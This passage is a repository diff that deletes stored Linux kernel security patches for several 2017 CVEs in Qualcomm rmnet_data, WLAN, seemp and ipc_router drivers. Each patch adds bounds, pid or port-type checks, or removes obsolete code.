-+ * Copyright (c) 2013-2015, 2017 The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -531,6 +531,11 @@ void rmnet_config_netlink_msg_handler(struct sk_buff *skb)
- 	nlmsg_header = (struct nlmsghdr *) skb->data;
- 	rmnet_header = (struct rmnet_nl_msg_s *) nlmsg_data(nlmsg_header);
- 
-+	if (!nlmsg_header->nlmsg_pid ||
-+	    (nlmsg_header->nlmsg_len < sizeof(struct nlmsghdr) +
-+				       sizeof(struct rmnet_nl_msg_s)))
-+		return;
-+
- 	LOGL("Netlink message pid=%d, seq=%d, length=%d, rmnet_type=%d",
- 		nlmsg_header->nlmsg_pid,
- 		nlmsg_header->nlmsg_seq,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0460/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-0460/3.18/0002.patch
deleted file mode 100644
index 28fe2cee..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0460/3.18/0002.patch
+++ /dev/null
@@ -1,52 +0,0 @@
-From 8e2e23126709ebffa1bd91e1a6ac77e16714d852 Mon Sep 17 00:00:00 2001
-From: Conner Huff <chuff@codeaurora.org>
-Date: Thu, 12 Jan 2017 22:09:16 -0700
-Subject: net: rmnet_data: Fix incorrect netlink handling
-
-rmnet_data netlink handler currently does not check for the
-incoming process pid and instead just loops back the pid.
-A malicious root user could potentially send a message with
-source pid 0 and this could cause rmnet_data to loop the message
-back till an out of memory situation occurs.
-
-rmnet_data also does not check for the message length of the
-incoming netlink messages and instead casts the netlink message
-without checking for the boundary.
-
-Fix these two scenarios by adding the pid and message length checks
-respectively.
-
-Bug: 31252965
-CRs-Fixed: 1098801
-Change-Id: I172c1a7112e67e82959b397af7ddfd963d819bdc
-Signed-off-by: Conner Huff <chuff@codeaurora.org>
----
- net/rmnet_data/rmnet_data_config.c | 7 ++++++-
- 1 file changed, 6 insertions(+), 1 deletion(-)
-
-diff --git a/net/rmnet_data/rmnet_data_config.c b/net/rmnet_data/rmnet_data_config.c
-index 9f5a2cc..7876b74 100644
---- a/net/rmnet_data/rmnet_data_config.c
-+++ b/net/rmnet_data/rmnet_data_config.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2013-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2013-2015, 2017 The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -531,6 +531,11 @@ void rmnet_config_netlink_msg_handler(struct sk_buff *skb)
- 	nlmsg_header = (struct nlmsghdr *) skb->data;
- 	rmnet_header = (struct rmnet_nl_msg_s *) nlmsg_data(nlmsg_header);
- 
-+	if (!nlmsg_header->nlmsg_pid ||
-+	    (nlmsg_header->nlmsg_len < sizeof(struct nlmsghdr) +
-+				       sizeof(struct rmnet_nl_msg_s)))
-+		return;
-+
- 	LOGL("Netlink message pid=%d, seq=%d, length=%d, rmnet_type=%d",
- 		nlmsg_header->nlmsg_pid,
- 		nlmsg_header->nlmsg_seq,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0460/4.4/0003.patch b/Patches/Linux_CVEs/CVE-2017-0460/4.4/0003.patch
deleted file mode 100644
index f42e4f26..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0460/4.4/0003.patch
+++ /dev/null
@@ -1,52 +0,0 @@
-From 85cccedb0cae0331228cc58fa91d31810018df98 Mon Sep 17 00:00:00 2001
-From: Conner Huff <chuff@codeaurora.org>
-Date: Thu, 12 Jan 2017 22:09:16 -0700
-Subject: net: rmnet_data: Fix incorrect netlink handling
-
-rmnet_data netlink handler currently does not check for the
-incoming process pid and instead just loops back the pid.
-A malicious root user could potentially send a message with
-source pid 0 and this could cause rmnet_data to loop the message
-back till an out of memory situation occurs.
-
-rmnet_data also does not check for the message length of the
-incoming netlink messages and instead casts the netlink message
-without checking for the boundary.
-
-Fix these two scenarios by adding the pid and message length checks
-respectively.
-
-Bug: 31252965
-CRs-Fixed: 1098801
-Change-Id: I172c1a7112e67e82959b397af7ddfd963d819bdc
-Signed-off-by: Conner Huff <chuff@codeaurora.org>
----
- net/rmnet_data/rmnet_data_config.c | 7 ++++++-
- 1 file changed, 6 insertions(+), 1 deletion(-)
-
-diff --git a/net/rmnet_data/rmnet_data_config.c b/net/rmnet_data/rmnet_data_config.c
-index ebce455..fb4c60f 100644
---- a/net/rmnet_data/rmnet_data_config.c
-+++ b/net/rmnet_data/rmnet_data_config.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2013-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -540,6 +540,11 @@ void rmnet_config_netlink_msg_handler(struct sk_buff *skb)
- 	nlmsg_header = (struct nlmsghdr *) skb->data;
- 	rmnet_header = (struct rmnet_nl_msg_s *) nlmsg_data(nlmsg_header);
- 
-+	if (!nlmsg_header->nlmsg_pid ||
-+	    (nlmsg_header->nlmsg_len < sizeof(struct nlmsghdr) +
-+				       sizeof(struct rmnet_nl_msg_s)))
-+		return;
-+
- 	LOGL("Netlink message pid=%d, seq=%d, length=%d, rmnet_type=%d",
- 		nlmsg_header->nlmsg_pid,
- 		nlmsg_header->nlmsg_seq,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0461/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-0461/qcacld-2.0/0001.patch
deleted file mode 100644
index 7c84dc2c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0461/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,53 +0,0 @@
-From ce5d6f84420a2e6ca6aad6b866992970dd313a65 Mon Sep 17 00:00:00 2001
-From: Srinivas Girigowda <sgirigow@codeaurora.org>
-Date: Mon, 12 Dec 2016 18:45:32 -0800
-Subject: qcacld-2.0: Fix array out-of-bounds & integer underflow in
- _iw_set_genie
-
-'wrqu->data.length' holds the total number of IE data buffer.
-Add a check to make sure the number of remaining data to be read is
-greater than or equal to IE length.
-
-Also, advance the buffer pointer to point to the next element only
-if next element is present.
-
-Change-Id: Ic60f3e0650f365955dab4099eb8740e9789e00cc
-CRs-Fixed: 1100132
----
- CORE/HDD/src/wlan_hdd_wext.c | 12 +++++++++++-
- 1 file changed, 11 insertions(+), 1 deletion(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c
-index 0549c3c..574b1ef 100644
---- a/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/CORE/HDD/src/wlan_hdd_wext.c
-@@ -2755,6 +2755,13 @@ static int __iw_set_genie(struct net_device *dev, struct iw_request_info *info,
-         hddLog(VOS_TRACE_LEVEL_INFO, "%s: IE[0x%X], LEN[%d]",
-             __func__, elementId, eLen);
- 
-+        if (remLen < eLen) {
-+            hddLog(LOGE, "Remaining len: %u less than ie len: %u",
-+                   remLen, eLen);
-+            ret = -EINVAL;
-+            goto exit;
-+        }
-+
-         switch ( elementId )
-          {
-             case IE_EID_VENDOR:
-@@ -2837,8 +2844,11 @@ static int __iw_set_genie(struct net_device *dev, struct iw_request_info *info,
-                 hddLog (LOGE, "%s Set UNKNOWN IE %X",__func__, elementId);
-                 goto exit;
-     }
--        genie += eLen;
-         remLen -= eLen;
-+
-+        /* Move genie only if next element is present */
-+        if (remLen >= 2)
-+            genie += eLen;
-     }
- exit:
-     EXIT();
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0462/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-0462/3.18/0001.patch
deleted file mode 100644
index af26ac15..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0462/3.18/0001.patch
+++ /dev/null
@@ -1,63 +0,0 @@
-From eb7b1426279e751b1fc3e86f434dc349945c1ae7 Mon Sep 17 00:00:00 2001
-From: ahmedsh <ahmedsh@codeaurora.org>
-Date: Wed, 4 Jan 2017 16:00:27 -0500
-Subject: seemp: use local stack mem when encoding params
-
-Avoid race condition in driver when encoding param by
-reading contents from a local copy instead of msg buffer
-itself which can be mapped to user space.
-
-Change-Id: I9f111c078baefca6e6f1fcda30af1044891a3356
-Signed-off-by: Ahmed Sheikh <ahmedsh@codeaurora.org>
----
- .../platform/msm/seemp_core/seemp_event_encoder.c   | 21 ++++++++++++++++-----
- 1 file changed, 16 insertions(+), 5 deletions(-)
-
-diff --git a/drivers/platform/msm/seemp_core/seemp_event_encoder.c b/drivers/platform/msm/seemp_core/seemp_event_encoder.c
-index df56a84..36901f5 100644
---- a/drivers/platform/msm/seemp_core/seemp_event_encoder.c
-+++ b/drivers/platform/msm/seemp_core/seemp_event_encoder.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2015, 2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -48,9 +48,15 @@ static void check_param_range(char *section_eq, bool param,
- 
- void encode_seemp_params(struct seemp_logk_blk *blk)
- {
--	char *s = blk->payload.msg + 1;
-+	struct seemp_logk_blk tmp;
-+	char *s = 0;
-+	char *msg_section_start = 0;
-+	char *msg_section_eq = 0;
-+	char *msg_s = 0;
- 
--	blk->payload.msg[BLK_MAX_MSG_SZ - 1] = 0; /* zero-terminate */
-+	memcpy(tmp.payload.msg, blk->payload.msg, BLK_MAX_MSG_SZ);
-+	s = tmp.payload.msg + 1;
-+	tmp.payload.msg[BLK_MAX_MSG_SZ - 1] = 0; /* zero-terminate */
- 
- 	while (true) {
- 		char *section_start = s;
-@@ -105,8 +111,13 @@ void encode_seemp_params(struct seemp_logk_blk *blk)
- 			}
- 		}
- 
--		encode_seemp_section(section_start, section_eq, s, param,
--					numeric, id, numeric_value);
-+		msg_section_start = blk->payload.msg + (section_start -
-+				tmp.payload.msg);
-+		msg_section_eq = blk->payload.msg + (section_eq -
-+				tmp.payload.msg);
-+		msg_s = blk->payload.msg + (s - tmp.payload.msg);
-+		encode_seemp_section(msg_section_start, msg_section_eq,
-+				msg_s, param, numeric, id, numeric_value);
- 
- 		if (*s == 0)
- 			break;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0462/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-0462/4.4/0002.patch
deleted file mode 100644
index aeb09e15..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0462/4.4/0002.patch
+++ /dev/null
@@ -1,63 +0,0 @@
-From 9a71e9a686942ae3c491061ab275a3678ee2819a Mon Sep 17 00:00:00 2001
-From: ahmedsh <ahmedsh@codeaurora.org>
-Date: Mon, 9 Jan 2017 17:24:09 -0500
-Subject: seemp: use local stack mem when encoding params
-
-Avoid race condition in driver when encoding param by
-reading contents from a local copy instead of msg buffer
-itself which can be mapped to user space.
-
-Change-Id: I405ca6c7fcb0afa112e0851907b5dca805ac5411
-Signed-off-by: Ahmed Sheikh <ahmedsh@codeaurora.org>
----
- .../platform/msm/seemp_core/seemp_event_encoder.c   | 21 ++++++++++++++++-----
- 1 file changed, 16 insertions(+), 5 deletions(-)
-
-diff --git a/drivers/platform/msm/seemp_core/seemp_event_encoder.c b/drivers/platform/msm/seemp_core/seemp_event_encoder.c
-index df56a84..36901f5 100644
---- a/drivers/platform/msm/seemp_core/seemp_event_encoder.c
-+++ b/drivers/platform/msm/seemp_core/seemp_event_encoder.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2015, 2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -48,9 +48,15 @@ static void check_param_range(char *section_eq, bool param,
- 
- void encode_seemp_params(struct seemp_logk_blk *blk)
- {
--	char *s = blk->payload.msg + 1;
-+	struct seemp_logk_blk tmp;
-+	char *s = 0;
-+	char *msg_section_start = 0;
-+	char *msg_section_eq = 0;
-+	char *msg_s = 0;
- 
--	blk->payload.msg[BLK_MAX_MSG_SZ - 1] = 0; /* zero-terminate */
-+	memcpy(tmp.payload.msg, blk->payload.msg, BLK_MAX_MSG_SZ);
-+	s = tmp.payload.msg + 1;
-+	tmp.payload.msg[BLK_MAX_MSG_SZ - 1] = 0; /* zero-terminate */
- 
- 	while (true) {
- 		char *section_start = s;
-@@ -105,8 +111,13 @@ void encode_seemp_params(struct seemp_logk_blk *blk)
- 			}
- 		}
- 
--		encode_seemp_section(section_start, section_eq, s, param,
--					numeric, id, numeric_value);
-+		msg_section_start = blk->payload.msg + (section_start -
-+				tmp.payload.msg);
-+		msg_section_eq = blk->payload.msg + (section_eq -
-+				tmp.payload.msg);
-+		msg_s = blk->payload.msg + (s - tmp.payload.msg);
-+		encode_seemp_section(msg_section_start, msg_section_eq,
-+				msg_s, param, numeric, id, numeric_value);
- 
- 		if (*s == 0)
- 			break;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0463/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-0463/3.18/0001.patch
deleted file mode 100644
index 4de1757c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0463/3.18/0001.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From 955bd7e7ac097bdffbadafab90e5378038fefeb2 Mon Sep 17 00:00:00 2001
-From: Karthikeyan Ramasubramanian <kramasub@codeaurora.org>
-Date: Thu, 15 Dec 2016 08:13:20 -0700
-Subject: net: ipc_router: Register services only on client port
-
-Allowing services to be registered on a non-client port will cause either
-an existing service or a control port to be over-written. This will cause
-undefined functional behavior.
-
-Allow the services to be registered only on client ports.
-
-CRs-Fixed: 1101792
-Change-Id: If6cfc75e9314204b7b44957f1598a8a2e1a45325
-Signed-off-by: Karthikeyan Ramasubramanian <kramasub@codeaurora.org>
----
- net/ipc_router/ipc_router_core.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/net/ipc_router/ipc_router_core.c b/net/ipc_router/ipc_router_core.c
-index ee4a873..9c784e8 100644
---- a/net/ipc_router/ipc_router_core.c
-+++ b/net/ipc_router/ipc_router_core.c
-@@ -2799,6 +2799,9 @@ int msm_ipc_router_register_server(struct msm_ipc_port *port_ptr,
- 	if (!port_ptr || !name)
- 		return -EINVAL;
- 
-+	if (port_ptr->type != CLIENT_PORT)
-+		return -EINVAL;
-+
- 	if (name->addrtype != MSM_IPC_ADDR_NAME)
- 		return -EINVAL;
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0463/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-0463/4.4/0002.patch
deleted file mode 100644
index 03048d21..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0463/4.4/0002.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From 32c229060ca33b816c50eedc136ea2800f9974df Mon Sep 17 00:00:00 2001
-From: Karthikeyan Ramasubramanian <kramasub@codeaurora.org>
-Date: Thu, 15 Dec 2016 08:13:20 -0700
-Subject: net: ipc_router: Register services only on client port
-
-Allowing services to be registered on a non-client port will cause either
-an existing service or a control port to be over-written. This will cause
-undefined functional behavior.
-
-Allow the services to be registered only on client ports.
-
-CRs-Fixed: 1101792
-Change-Id: If6cfc75e9314204b7b44957f1598a8a2e1a45325
-Signed-off-by: Karthikeyan Ramasubramanian <kramasub@codeaurora.org>
----
- net/ipc_router/ipc_router_core.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/net/ipc_router/ipc_router_core.c b/net/ipc_router/ipc_router_core.c
-index 008d034f..d23799a 100644
---- a/net/ipc_router/ipc_router_core.c
-+++ b/net/ipc_router/ipc_router_core.c
-@@ -2809,6 +2809,9 @@ int msm_ipc_router_register_server(struct msm_ipc_port *port_ptr,
- 	if (!port_ptr || !name)
- 		return -EINVAL;
- 
-+	if (port_ptr->type != CLIENT_PORT)
-+		return -EINVAL;
-+
- 	if (name->addrtype != MSM_IPC_ADDR_NAME)
- 		return -EINVAL;
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0464/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-0464/qcacld-2.0/0001.patch
deleted file mode 100644
index f3f224eb..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0464/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,1101 +0,0 @@
-From 051597a4fe19fd1292fb7ea2e627d12d1fd2934f Mon Sep 17 00:00:00 2001
-From: Srinivas Girigowda <sgirigow@codeaurora.org>
-Date: Fri, 16 Dec 2016 18:32:10 -0800
-Subject: qcacld-2.0: Remove obsolete set/reset ssid hotlist
-
-Remove obsolete set/reset ssid hotlist.
-
-Change-Id: Ie6c4a9847f2daa9ba2aebd17f386d584201b86d6
-CRs-Fixed: 1102593
----
- CORE/HDD/inc/wlan_hdd_cfg80211.h         |  20 +-
- CORE/HDD/src/wlan_hdd_cfg80211.c         | 560 -------------------------------
- CORE/MAC/inc/sirApi.h                    |  33 --
- CORE/MAC/src/include/sirParams.h         |   2 +-
- CORE/SERVICES/WMA/wma.c                  | 219 ------------
- CORE/SME/inc/sme_Api.h                   |   4 -
- CORE/SME/src/sme_common/sme_Api.c        |  46 ---
- CORE/SYS/legacy/src/utils/src/macTrace.c |   1 -
- 8 files changed, 7 insertions(+), 878 deletions(-)
-
-diff --git a/CORE/HDD/inc/wlan_hdd_cfg80211.h b/CORE/HDD/inc/wlan_hdd_cfg80211.h
-index 3e46b3e..9a943af 100644
---- a/CORE/HDD/inc/wlan_hdd_cfg80211.h
-+++ b/CORE/HDD/inc/wlan_hdd_cfg80211.h
-@@ -219,10 +219,12 @@ enum qca_nl80211_vendor_subcmds {
-     /* Start Wifi Memory Dump */
-     QCA_NL80211_VENDOR_SUBCMD_WIFI_LOGGER_MEMORY_DUMP = 63,
-     QCA_NL80211_VENDOR_SUBCMD_ROAM = 64,
--    QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_SET_SSID_HOTLIST = 65,
--    QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_RESET_SSID_HOTLIST = 66,
--    QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_HOTLIST_SSID_FOUND = 67,
--    QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_HOTLIST_SSID_LOST = 68,
-+
-+    /*
-+     * APIs corresponding to the sub commands 65-68 are deprecated.
-+     * These sub commands are reserved and not supposed to be used
-+     * for any other purpose
-+     */
-     QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_PNO_SET_LIST = 69,
-     QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_PNO_SET_PASSPOINT_LIST = 70,
-     QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_PNO_RESET_PASSPOINT_LIST = 71,
-@@ -333,12 +335,6 @@ enum qca_nl80211_vendor_subcmds_index {
-     QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_PNO_PASSPOINT_NETWORK_FOUND_INDEX,
- #endif /* FEATURE_WLAN_EXTSCAN */
- 
--#ifdef FEATURE_WLAN_EXTSCAN
--    QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_SET_SSID_HOTLIST_INDEX,
--    QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_RESET_SSID_HOTLIST_INDEX,
--    QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_HOTLIST_SSID_FOUND_INDEX,
--    QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_HOTLIST_SSID_LOST_INDEX,
--#endif
-     /* OCB events */
-     QCA_NL80211_VENDOR_SUBCMD_DCC_STATS_EVENT_INDEX,
- #ifdef WLAN_FEATURE_MEMDUMP
-@@ -802,10 +798,6 @@ enum qca_wlan_vendor_attr_extscan_results
-     /* Unsigned 32bit value; a EXTSCAN Capabilities attribute. */
-     QCA_WLAN_VENDOR_ATTR_EXTSCAN_RESULTS_CAPABILITIES_MAX_NUM_WHITELISTED_SSID,
- 
--    /* EXTSCAN attributes for
--     * QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_HOTLIST_SSID_FOUND sub-command &
--     * QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_HOTLIST_SSID_LOST sub-command
--     */
-     /* Use attr QCA_WLAN_VENDOR_ATTR_EXTSCAN_NUM_RESULTS_AVAILABLE
-      * to indicate number of results.
-      */
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index 532ec5a..4e3e7d4 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -1223,14 +1223,6 @@ static const struct nl80211_vendor_cmd_info wlan_hdd_cfg80211_vendor_events[] =
-         .vendor_id = QCA_NL80211_VENDOR_ID,
-         .subcmd = QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_RESET_SIGNIFICANT_CHANGE
-     },
--    [QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_HOTLIST_SSID_FOUND_INDEX] = {
--        .vendor_id = QCA_NL80211_VENDOR_ID,
--        .subcmd = QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_HOTLIST_SSID_FOUND
--    },
--    [QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_HOTLIST_SSID_LOST_INDEX] = {
--        .vendor_id = QCA_NL80211_VENDOR_ID,
--        .subcmd = QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_HOTLIST_SSID_LOST
--    },
- #endif /* FEATURE_WLAN_EXTSCAN */
- 
- #ifdef WLAN_FEATURE_LINK_LAYER_STATS
-@@ -1307,14 +1299,6 @@ static const struct nl80211_vendor_cmd_info wlan_hdd_cfg80211_vendor_events[] =
-         .vendor_id = QCA_NL80211_VENDOR_ID,
-         .subcmd = QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_PNO_PASSPOINT_NETWORK_FOUND
-     },
--    [QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_SET_SSID_HOTLIST_INDEX] = {
--        .vendor_id = QCA_NL80211_VENDOR_ID,
--        .subcmd = QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_SET_SSID_HOTLIST
--    },
--    [QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_RESET_SSID_HOTLIST_INDEX] = {
--        .vendor_id = QCA_NL80211_VENDOR_ID,
--        .subcmd = QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_RESET_SSID_HOTLIST
--    },
-     [QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_HOTLIST_AP_LOST_INDEX] = {
-         .vendor_id = QCA_NL80211_VENDOR_ID,
-         .subcmd = QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_HOTLIST_AP_LOST
-@@ -3033,253 +3017,6 @@ static int wlan_hdd_cfg80211_extscan_set_bssid_hotlist(struct wiphy *wiphy,
- }
- 
- 
--/*
-- * define short names for the global vendor params
-- * used by wlan_hdd_cfg80211_extscan_set_ssid_hotlist()
-- */
--#define PARAM_MAX \
--		QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_MAX
--#define PARAM_REQUEST_ID \
--		QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_REQUEST_ID
--#define PARAMS_LOST_SSID_SAMPLE_SIZE \
--		QCA_WLAN_VENDOR_ATTR_EXTSCAN_SSID_HOTLIST_PARAMS_LOST_SSID_SAMPLE_SIZE
--#define PARAMS_NUM_SSID \
--		QCA_WLAN_VENDOR_ATTR_EXTSCAN_SSID_HOTLIST_PARAMS_NUM_SSID
--#define THRESHOLD_PARAM \
--		QCA_WLAN_VENDOR_ATTR_EXTSCAN_SSID_THRESHOLD_PARAM
--#define PARAM_SSID \
--		QCA_WLAN_VENDOR_ATTR_EXTSCAN_SSID_THRESHOLD_PARAM_SSID
--#define PARAM_BAND \
--		QCA_WLAN_VENDOR_ATTR_EXTSCAN_SSID_THRESHOLD_PARAM_BAND
--#define PARAM_RSSI_LOW \
--		QCA_WLAN_VENDOR_ATTR_EXTSCAN_SSID_THRESHOLD_PARAM_RSSI_LOW
--#define PARAM_RSSI_HIGH \
--		QCA_WLAN_VENDOR_ATTR_EXTSCAN_SSID_THRESHOLD_PARAM_RSSI_HIGH
--
--/**
-- * __wlan_hdd_cfg80211_extscan_set_ssid_hotlist() - set ssid hot list
-- * @wiphy: Pointer to wireless phy
-- * @wdev: Pointer to wireless device
-- * @data: Pointer to data
-- * @data_len: Data length
-- *
-- * Return: 0 on success, negative errno on failure
-- */
--static int
--__wlan_hdd_cfg80211_extscan_set_ssid_hotlist(struct wiphy *wiphy,
--					   struct wireless_dev *wdev,
--					   const void *data,
--					   int data_len)
--{
--	struct sir_set_ssid_hotlist_request *request;
--	struct net_device *dev = wdev->netdev;
--	hdd_adapter_t *adapter = WLAN_HDD_GET_PRIV_PTR(dev);
--	hdd_context_t *hdd_ctx = wiphy_priv(wiphy);
--	struct nlattr *tb[PARAM_MAX + 1];
--	struct nlattr *tb2[PARAM_MAX + 1];
--	struct nlattr *ssids;
--	struct hdd_ext_scan_context *context;
--	uint32_t request_id;
--	char ssid_string[SIR_MAC_MAX_SSID_LENGTH + 1];
--	int ssid_len, ssid_length;
--	eHalStatus status;
--	int i, rem, retval;
--	unsigned long rc;
--
--	ENTER();
--
--	if (VOS_FTM_MODE == hdd_get_conparam()) {
--		hddLog(LOGE, FL("Command not allowed in FTM mode"));
--		return -EINVAL;
--	}
--
--	retval = wlan_hdd_validate_context(hdd_ctx);
--	if (0 != retval)
--		return -EINVAL;
--
--	if (nla_parse(tb, PARAM_MAX,
--		      data, data_len,
--		      wlan_hdd_extscan_config_policy)) {
--		hddLog(LOGE, FL("Invalid ATTR"));
--		return -EINVAL;
--	}
--
--	request = vos_mem_malloc(sizeof(*request));
--	if (!request) {
--		hddLog(LOGE, FL("vos_mem_malloc failed"));
--		return -ENOMEM;
--	}
--
--	/* Parse and fetch request Id */
--	if (!tb[PARAM_REQUEST_ID]) {
--		hddLog(LOGE, FL("attr request id failed"));
--		goto fail;
--	}
--
--	request->request_id = nla_get_u32(tb[PARAM_REQUEST_ID]);
--	hddLog(LOG1, FL("Request Id %d"), request->request_id);
--
--	/* Parse and fetch lost SSID sample size */
--	if (!tb[PARAMS_LOST_SSID_SAMPLE_SIZE]) {
--		hddLog(LOGE, FL("attr number of Ssid failed"));
--		goto fail;
--	}
--	request->lost_ssid_sample_size =
--		nla_get_u32(tb[PARAMS_LOST_SSID_SAMPLE_SIZE]);
--	hddLog(LOG1, FL("Lost SSID Sample Size %d"),
--	       request->lost_ssid_sample_size);
--
--	/* Parse and fetch number of hotlist SSID */
--	if (!tb[PARAMS_NUM_SSID]) {
--		hddLog(LOGE, FL("attr number of Ssid failed"));
--		goto fail;
--	}
--	request->ssid_count = nla_get_u32(tb[PARAMS_NUM_SSID]);
--	hddLog(LOG1, FL("Number of SSID %d"), request->ssid_count);
--
--	request->session_id = adapter->sessionId;
--	hddLog(LOG1, FL("Session Id (%d)"), request->session_id);
--
--	i = 0;
--	nla_for_each_nested(ssids, tb[THRESHOLD_PARAM], rem) {
--		if (i >= WLAN_EXTSCAN_MAX_HOTLIST_SSIDS) {
--			hddLog(LOGE,
--			       FL("Too Many SSIDs, %d exceeds %d"),
--			       i, WLAN_EXTSCAN_MAX_HOTLIST_SSIDS);
--			break;
--		}
--		if (nla_parse(tb2, PARAM_MAX,
--			      nla_data(ssids), nla_len(ssids),
--			      wlan_hdd_extscan_config_policy)) {
--			hddLog(LOGE, FL("nla_parse failed"));
--			goto fail;
--		}
--
--		/* Parse and fetch SSID */
--		if (!tb2[PARAM_SSID]) {
--			hddLog(LOGE, FL("attr ssid failed"));
--			goto fail;
--		}
--		ssid_length = nla_strlcpy(ssid_string,
--			   tb2[PARAM_SSID],
--			   sizeof(ssid_string));
--
--		/* nla_parse will detect overflow but not underflow */
--		if (0 == ssid_length) {
--			hddLog(LOGE, FL("zero ssid length"));
--			goto fail;
--		}
--		hddLog(LOG1, FL("SSID %s"), ssid_string);
--		ssid_len = strlen(ssid_string);
--		if (ssid_length > SIR_MAC_MAX_SSID_LENGTH) {
--			hddLog(LOGE, FL("Invalid ssid length"));
--			goto fail;
--		}
--		memcpy(request->ssids[i].ssid.ssId, ssid_string, ssid_len);
--		request->ssids[i].ssid.length = ssid_len;
--
--		/* Parse and fetch low RSSI */
--		if (!tb2[PARAM_BAND]) {
--			hddLog(LOGE, FL("attr band failed"));
--			goto fail;
--		}
--		request->ssids[i].band = nla_get_u8(tb2[PARAM_BAND]);
--		hddLog(LOG1, FL("band %d"), request->ssids[i].band);
--
--		/* Parse and fetch low RSSI */
--		if (!tb2[PARAM_RSSI_LOW]) {
--			hddLog(LOGE, FL("attr low RSSI failed"));
--			goto fail;
--		}
--		request->ssids[i].rssi_low = nla_get_s32(tb2[PARAM_RSSI_LOW]);
--		hddLog(LOG1, FL("RSSI low %d"), request->ssids[i].rssi_low);
--
--		/* Parse and fetch high RSSI */
--		if (!tb2[PARAM_RSSI_HIGH]) {
--			hddLog(LOGE, FL("attr high RSSI failed"));
--			goto fail;
--		}
--		request->ssids[i].rssi_high = nla_get_u32(tb2[PARAM_RSSI_HIGH]);
--		hddLog(LOG1, FL("RSSI high %d"), request->ssids[i].rssi_high);
--		i++;
--	}
--
--	context = &hdd_ctx->ext_scan_context;
--	spin_lock(&hdd_context_lock);
